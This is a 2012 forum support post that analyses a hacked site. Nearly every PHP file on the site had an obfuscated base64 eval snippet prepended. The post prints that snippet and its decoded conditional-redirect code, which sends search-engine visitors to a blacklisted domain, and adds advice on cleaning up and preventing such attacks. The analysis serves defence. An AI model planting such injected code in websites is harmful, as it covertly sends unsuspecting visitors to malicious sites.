by
KK » Sat Mar 24, 2012 9:35 pm
@ntoupin
Some news for you.
The owner of
http://www.arsenicdesignlab.com responded and graciously allowed me access to the site.
As suspected, this is what I found -
Almost every PHP file on his site had this obfuscated code prepended to it
- Code: Select all
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw
0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9T
RVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0
lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwi
YmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2
dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0
Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIi
kgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxl
dXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
J0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwm
bHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcm
VmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaX
N0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIo
IkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn
0KfQp9DQp9DQp9"));
Decoded, the bytes above become
- Code: Select all
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or
stristr($referer,"bing") or
stristr($referer,"rambler") or
stristr($referer,"gogo") or
stristr($referer,"live.com")or
stristr($referer,"aport") or
stristr($referer,"nigma") or
stristr($referer,"webalta") or
stristr($referer,"begun.ru") or
stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or
stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or
stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://gigop.americanunfinished.com/");
exit();
}
}
}
}
}
As can be seen, the injected code is a 'Conditional redirect malware' and is supposed to redirect users visiting the site through search-engines to
http://gigop.americanunfinished.com/ (a black-listed site).
As it happens, Couch's files are Ioncube encoded and the addition of the code only serves to make Ioncube detect that the file has been tampered with and throw the 'File corrupted' error you reported.
In all probability, that is what is happening on your site too.
Although the condition really is unrelated to Couch (a quick Google search will reveal that Wordpress and Joomla are the ones most affected), it would be proper to discuss ways of preventing this from happening -
http://redleg-redleg.blogspot.in/2012/0 ... ee-pl.html discusses this very exploit in detail and has a few good tips worth emulating. A few quotes from the site
Most hacked sites I see are due to compromised passwords. Start by doing a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, use a couple of different security packages. Change ALL passwords especially FTP. Never store/save your passwords in your FTP client, use secure FTP if available. Install a good anti-virus program and do regular scans of your computer. You hosting service may be able to help you pin it down, if you notify when you see any changes they could check the access logs and maybe determine the account being used when the files are modified.
The second most common thing I see is problems with file/folder permissions. The hackers get access to a site and open the file permissions up on a folder/file so they can continue to get access even if you change passwords etc. You'll see different views on what permissions should be I go with Files set to 644 Folders set to 755. It is a good idea to regularly check file/folder permissions.
Make sure you are running the latest versions and security patches of all software, CMS, Plugins, themes etc.
Frequently I also see hackers leave a backdoor on a site. This is usually a php file hidden away somewhere with system files, /cgi-bin/ used to be a popular place. This will be a php file that is not part of your site and it will contain a bunch of obfuscated stuff. There is an excellent article with some tips on how to find a backdoor from 25 Years of Programming -- Website security: How to find backdoor PHP shell scripts on a server.
If you have not already done so suggest you start by scanning your PC for trojans etc. then change all passwords, make sure your FTP account is not compromised. Check all folder/file permissions and make sure they are locked down.
And as a word of caution, do NOT use Filezilla FTP client to transfer the files. It stores all passwords in plain text format, so if your PC gets compromised your passwords stored in it will get stolen as well.
Hope this helps.